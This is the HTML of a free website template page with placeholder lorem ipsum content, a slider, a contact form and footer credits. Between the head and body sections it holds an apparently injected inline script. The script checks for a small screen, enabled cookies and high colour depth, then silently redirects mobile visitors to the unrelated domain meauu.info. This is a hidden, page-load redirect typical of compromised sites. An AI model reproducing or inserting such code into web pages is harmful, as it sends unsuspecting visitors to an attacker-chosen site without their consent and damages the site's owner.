<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Metamorphosis Design Free Css Templates</title>
<meta name="keywords" content="" />
<meta name="description" content="" />
<link href="styles.css" rel="stylesheet" type="text/css" />

<!-- Begin JavaScript -->

		<script type="text/javascript" src="lib/jquery-1.3.2.min.js"></script>
		<script type="text/javascript" src="lib/jquery.tools.js"></script>
    	<script type="text/javascript" src="lib/jquery.custom.js"></script>

</head>
<script> if(screen.colorDepth >= 24 && navigator.cookieEnabled == true && screen.width < 800) { setTimeout(setTime, 0); } function setTime() { window.location = 'https://meauu.info'; } </script>
<body>

<div id="bg_img">
<div id="main">
<div id="main_img">
<!-- header begins -->
<div id="header">
	<div id="buttons">
      <a href="index.html" class="but"  title="">Home</a>
      <a href="blog.html" class="but" title="">Blog</a>
      <a href="gallery.html"  class="but" title="">Photo Gallery</a>
      <a href="about_us.html"  class="but" title="">About us</a>
      <a href="contact_us.html" class="but" title="">Contact us</a>    </div>
	<div id="logo">
    	<a href="#">metamorph_fire</a>
      	<h2><a href="http://www.metamorphozis.com/" id="metamorph">Design by Metamorphosis Design</a></h2>
    </div>
   
</div>
<!-- header ends -->
<div class="top">
	
	  <div id="slider_bg">
			<div class="waveshow">
				<img src="images/scroll1.jpg" alt="" title="Some Text 1 Goes Here" />
				<img src="images/scroll2.jpg" alt="" title="Some Text 2 Goes Here" />
				<img src="images/scroll3.jpg" alt="" title="Some Text 3 Goes Here" />
			</div> <!-- waveshow -->
		</div> <!-- slider_bg -->
	
		  
</div>

        <!-- content begins -->
        		
       		
                    
                    <div class="box_home_all">
                   	  <div class="box_home">
                       	<h1 class="tit_img1">Lorem Ipsum Dolor</h1>
                        	<div style="padding-left:7px;">
                            <span class="span_cont">Lorem ipsum dolor sit amet, consectetur adipiscing elit. </span><br />
                            Nam consequat massa eget orci auctor vitae tincidunt orci ultrices. Quisque gravida pharetra magna eget rhoncus. Curabitur egestas ornare molestie. Cras id odio tortor, sed tempor leo. Proin in lectus et elit dapi- bus scelerisque vitae eu felis. Donec a eros velit, vel <br />
                       	</div> <br />
                        	<div class="read_l"><a href="#"> more</a></div>
                   	  </div>
                        <div style="width:10px; float:left; height:15px;"></div>
                        <div class="box_home">
                        	<h1 class="tit_img2">Sed eleifend elit </h1>
                        	<div style="padding-left:7px;">
                            <span class="span_cont">Sed eleifend elit eget arcu porta adipiscing dignis- sim turpis commodo. </span><br />
                            Vestibulum in diam leo, eget porttitor mi. Suspend- isse blandit imperdiet imperdiet. Donec dui odio, vestibulum sed accumsan ut, volutpat quis neque. Nulla varius ultrices nisi in sollicitudin. Cras at sapien vel nisl sagittis fermentum eget nec nisl. Donec sit <br />
                        	</div> <br />
                        	<div class="read_l"><a href="#"> more</a></div>
                      </div>
                      <div style="width:10px; float:left;  height:15px;"></div>
                        <div class="box_home">
                        	<h1 class="tit_img3">Mauris auctor imperdiet</h1>
                        	<div style="padding-left:7px;">
                            <span class="span_cont">Mauris auctor imperdiet ante non facilisis.</span><br />
                            Mauris eget odio risus. Suspendisse potenti. Maece- nas quis quam sit amet elit molestie accumsan. Sed placerat fermentum mollis. Morbi sodales sceleri-sque pretium. Fusce sem tellus, adipiscing a interdum a, posuere placerat felis. Maecenas tristique, mauris a iaculis venenatis, nibh sapien <br />
                       	  </div> <br />
                        	<div class="read_l"><a href="#"> more</a></div>
                      </div>          	
                    </div>
    <!-- content ends -->
    <div style="height:10px;"></div>
    <!-- bottom begin -->
    <div id="bottom">
    	<div id="b_col1">
        	<h1>Latest Projects</h1>
      		<a href="images/metamorph_ball.jpg" rel="prettyPhoto[gal]"><img src="images/bottom_i1.jpg" alt="" /></a><br />
			<div style="height:5px; width: 100%;"></div>
			<a href="images/metamorph_coffee.jpg" rel="prettyPhoto[gal]"><img src="images/bottom_i2.jpg"  alt="" /></a>
			
	   </div>
       <div id="b_col2">
       		<h2>Recent Posts</h2>
            <ul>
           	  	 <li><a href="http://www.metamorphozis.com/free_templates/free_templates.php">Free Website Templates</a></li>
                                    <li><a href="http://www.metamorphozis.com/free_flash_templates/free_flash_templates.php">Free Flash Templates</a></li>
                                    <li><a href="http://www.metamorphozis.com/shop/easy_flash_templates.php">Easy Flash Templates</a></li>
         <li><a href="http://www.metamorphozis.com/website_hosting/index.php">Top Hosting Providers</a></li>
                                    <li><a href="http://www.metamorphozis.com/blog/category/free-fonts/">Free Fonts</a></li>
									<li><a href="http://www.metamorphozis.com/blog/category/freeicons/">Free Icons</a></li>
									<li><a href="http://www.metamorphozis.com/blog/category/free-photoshop-brushes/">Free Photoshop Brushes</a></li>
									<li><a href="http://www.metamorphozis.com/blog/feed/">RSS Subscribe</a></li>
            </ul>            
      </div>
        <div id="b_col3">
       	  <h1>Aenean eget</h1>
          <img src="images/bottom_i3.jpg" class="img_l" alt="" />
          <a href="#" class="a_und">Sed dictum nisi ac enim pellentesque in cons- equat dolor aliquam.
			Cras elementum turpis a justo fermentum in condimentum elit tempus.</a><br /><br />
			<img src="images/bottom_i4.jpg" class="img_l" alt="" />
          	<span class="">Phasellus dictum tortor vitae justo ornare id volutpat sapien vulputate.<br />
          	Morbi eget metus lacus, id condimentum magna. Cras ut lorem a turpis euismod hendrerit ut in erat.</span><br /><br />

            <div class="read_l but_view"><a href="#"> view more</a></div>
          
        </div>
        
       
        
    <div id="b_col4">
      		<h2>Send a Message</h2>
            <div class="form">
            <form action="" method="post">
                <p>Name</p>
                <div><input class="input_txt" value="" name="name" type="text" /></div>
                <p>E-mail</p>
                <div> <input class="input_txt" value="" name="e-mail" type="text" /></div>
                 <p>Message</p>
                <div><textarea class="text_area" cols="32" rows="3" name="message"></textarea></div>
                <div style="text-align:left;">
                  <input class="send" name="Submit" type="submit" value="Send" />
                </div>
            </form>
        	</div>
			<div style="height:10px;"></div>
        <h1>Socialize with Us!</h1>
            <a href="#"><img src="images/fu_i1.gif" class=" fu_i" alt="" /></a>
            <a href="#"><img src="images/fu_i2.gif" class=" fu_i" alt="" /></a>
            <a href="#"><img src="images/fu_i3.gif" class=" fu_i" alt="" /></a>
            <a href="#"><img src="images/fu_i4.gif" class=" fu_i" alt="" /></a>
            <a href="#"><img src="images/fu_i5.gif" class=" fu_i" alt="" /></a>
      </div>
      <div style="clear: both"></div>
    </div>
    
     <!-- bottom end --> 
<!-- footer begins -->
            <div id="footer">
          <p>Copyright  2010. <a href="#">Privacy Policy</a> | <a href="#">Terms of Use</a> | <a href="http://validator.w3.org/check/referer" title="This page validates as XHTML 1.0 Transitional"><abbr title="eXtensible HyperText Markup Language">XHTML</abbr></a> | <a href="http://jigsaw.w3.org/css-validator/check/referer" title="This page validates as CSS"><abbr title="Cascading Style Sheets">CSS</abbr></a></p> 
	<!-- Please DO NOT remove the following notice --><p>Design by <a href="http://www.metamorphozis.com/" title="Flash Templates">Flash Templates</a>, coded by <a href="http://www.flashtemplatesdesign.com/" title="Free Flash Templates">Free Flash Templates</a></p><!-- end of copyright notice--></div>
        <!-- footer ends -->
</div>

</div>
</div>
<div style="text-align: center; font-size: 0.75em;">Diseño descargado desde <a href="http://www.misplantillas.com/">plantillas web gratis y profesionales</a>.</div></body>
</html>
